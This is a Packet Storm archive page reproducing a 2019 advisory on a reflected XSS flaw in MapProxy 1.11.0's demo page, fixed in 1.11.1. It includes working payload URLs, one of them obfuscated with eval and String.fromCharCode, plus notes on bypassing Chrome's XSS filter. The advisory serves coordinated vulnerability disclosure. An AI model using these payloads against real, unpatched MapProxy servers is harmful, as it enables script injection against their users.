exploit the possibilities

MapProxy 1.11.0 Cross Site Scripting

MapProxy 1.11.0 Cross Site Scripting
Posted Aug 8, 2019
Authored by Janek Vind aka waraxe | Site waraxe.us

MapProxy version 1.11.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 0e07a7d40f1c725cd05b43db084ad338

MapProxy 1.11.0 Cross Site Scripting

Change Mirror Download

[waraxe-2019-SA#110] - Reflected XSS in MapProxy 1.11.0
================================================================================

Author: Janek Vind "waraxe"
Date: 07. August 2019
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-110.html

Target description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MapProxy is an open source proxy for geospatial data. It caches, accelerates and
transforms data from existing map services and serves any desktop or web GIS client.

https://mapproxy.org/

Vulnerable version: 1.11.0
Fixed version: 1.11.1

###############################################################################
1. Reflected XSS in demo service
###############################################################################

Reason:
* Insufficient sanitization of user-supplied data
Attack vector:
* User-supplied GET parameter "format"

Testing for Reflected XSS:

https://valid.host/demo/?wmts_layer=valid_layer&format=png"foo'bar&srs=valid_srs

Hostname, "wmts_layer" and "srs" must be valid.
Let's look at the HTML source:

------------------------[ source code start ]----------------------------------

<input type="hidden" name="format" value="png"foo'bar">

------------------------[ source code end ]------------------------------------

We can see that double quote character from GET parameter "format" is not sanitized
by MapProxy and this allows us to "break out" from HTML input element.
Unfortunately for attacker it's hidden input element and this kind of XSS issues
are hard to exploit:

https://portswigger.net/blog/xss-in-hidden-input-fields

But it appears that there is one more injection point:

------------------------[ source code start ]----------------------------------
var layer = new OpenLayers.Layer.WMTS({
name: "valid_layer",
url: '../wmts/valid_layer/{TileMatrixSet}/{TileMatrix}/{TileCol}/{TileRow}.png',
layer: 'valid_layer',
matrixSet: 'GMC',
format: 'png"foo'bar', <--- Injection point
isBaseLayer: true,
style: 'default',
requestEncoding: 'REST'
});
------------------------[ source code end ]------------------------------------

As seen above, MapProxy fails to sanitize single quotes too and this allows us
direct JavaScript injection.

Working XSS PoC:

https://valid.host/demo/?wmts_layer=valid_layer&format=png'-alert('XSS')-'&srs=valid_srs

It's worth to mention that XSS payload length is probably limited only with URL
max length and test with 1000 byte long payload was successful.
One more thing - Chrome web browser has built-in XSS countermeasures, but this exploit
works even with Chrome.

And of course it's possible to use more sophisticated XSS payloads:

https://valid.host/mapproxy/demo/?wmts_layer=valid_layer&
format=png'-eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))-'&srs=valid_srs

Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

12.07.2019 -> First email sent to developers
12.07.2019 -> Got first response from developers
12.07.2019 -> Sending detailed information to developers
06.08.2019 -> Found problems are fixed, new version available
07.08.2019 -> Waraxe advisory released

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/
Personal homepage: http://www.janekvind.com/

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close